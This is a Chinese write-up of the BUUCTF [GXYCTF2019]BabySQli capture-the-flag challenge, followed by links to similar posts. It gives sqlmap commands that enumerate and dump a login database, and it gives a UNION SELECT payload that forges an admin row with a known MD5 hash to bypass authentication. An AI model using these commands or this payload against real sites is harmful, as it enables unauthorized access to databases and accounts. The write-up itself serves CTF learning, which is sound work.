BUUCTF:[GXYCTF2019]BabySQli
打开靶机
是一个登录框。右键看一下源码。
可以看到是以post方法传参。感觉像时间盲注。随便输入一个用户名和密码,然后bp抓包。
我们把这个页面全部复制,创建一个txt文件粘贴进去。
把这个文件托进kali里然后打开终端,用sqlmap扫描数据库。
命令:sqlmap -r /home/wz/桌面/2.txt --dbs
这个文件路径就输入你的路径。然后一路点y。
可以看到数据库为:information_schema和web_sqli。根据经验我们应该爆破第二个。命令为:
sqlmap -r /home/wz/桌面/2.txt -D web_sqli --tables
可以看到爆出的表名为:user。我们爆字段。
命令为:sqlmap -r /home/wz/桌面/2.txt -D web_sqli -T user --columns
然后我们爆数据。命令为:sqlmap -r /home/wz/桌面/2.txt -D web_sqli -T user -C id,passwd,username --dump
然后你会发现这个md5碰撞不出来。我们还得构造。
mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5;所以我们去哈希一下123得202cb962ac59075b964b07152d234b70。
我们payload: name=1'union select 1,'admin','202cb962ac59075b964b07152d234b70'#&pw=123
最后放松一下眼睛。
![请添加图片描述](https://img-blog.csdnimg.cn/2052feaaf2184bdea3ed14a9450
图片是抖音@瞳瞳
BUUCTF:[GXYCTF2019]BabySQli相关推荐
- BUUCTF | [GXYCTF2019]BabySQli
BUUCTF | [GXYCTF2019]BabySQli 一.必备基础知识 当=号被过滤了使用like,rlike绕过 当or被过滤了使用大小写绕过,双写绕过,&&绕过 二.实战化渗 ...
- BUUCTF [GXYCTF2019]BabySQli 1
刚学完sqli,我才知道万能口令这么危险,还好我进行了防护,还用md5哈希了密码!# 打开容器 就单单两个输入栏,,多少有点简陋 看标签叫Do you know who am I?看来是要用,先用万能 ...
- buuctf [GXYCTF2019]BabySQli
今日份习题 名字叫babysqli 主界面是一个登陆页面,看起来好像不难的亚子 开搞! 通过尝试发现or,=,()都被过滤了 输入的时候,一个是wrong user,一个是wrong pass,尝试抓 ...
- buuctf [GXYCTF2019]BabySQli
常规sql注入都行不通,查看源码发现一个search.php, 先说说base32 和 base64 的区别, base32 只有大写字母和数字数字组成,或者后面有三个等号. base64 只有大写字 ...
- [ buuctf GXYCTF2019]BabySQli
输入账户 密码 后查看源代码 MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VS ...
- BUUCTF——[GXYCTF2019]BabySQli
文章目录 利用点 解题 分析 完 利用点 SQL字符型注入 UNION SELECT联合查询特性 解题 search.php的注释发现hint <!--MMZFM422K5HDASKDN5TVU ...
- BUUCTF[GXYCTF2019]BabySQli
SQL注入题型,在进行了自己的一些测试发现,用户名存在admin,我们F12看看源码: <meta http-equiv="Content-Type" content=&qu ...
- BUUCTF [GXYCTF2019] 禁止套娃
题目分析 这题对我这个小白来说好难理解,慢慢补坑吧.PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通. 打开题目,只有如下: 看源码也没有什么东西,常见的信息泄露:robots ...
- buuctf[GXYCTF2019]Ping Ping Ping
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行p ...
最新文章
- python 重载_python模块重载的五种方法
- 计算机后门做法正确的是,网络信息安全知识:张同学发现安全软件提醒自己的电脑有系统漏洞,如果你是张同学,最恰当的做法是?()...
- Sybase数据库 概述部署命令
- JAVA实现简单链表操作
- 【QM-05】Material Specification(物料说明)
- Dev-DXperience12.2版的新产品介绍:DXTREME
- Jetty 类载入问题处理
- 数据库设计器无法打开方法
- bzoj2662:[BeiJing wc2012]冻结
- Linux上的redis安装和后台启动
- [医疗开发]医疗相关名词解析
- Bailian4077 出栈序列统计【卡特兰数】(vijos P1122)
- indesign教程,如何转换图形和框架?
- android不透明度对应的值
- 建站百科|企业网站logo设计指南
- 笔记本计算机在桌面显示器,笔记本连接显示器
- linux常用命令大全,建议收藏
- 不可不知道的SEO与SEM术语大全
- 我喜欢的刀刀______扮演别人快乐么?
- WAS上配置数据源连接失败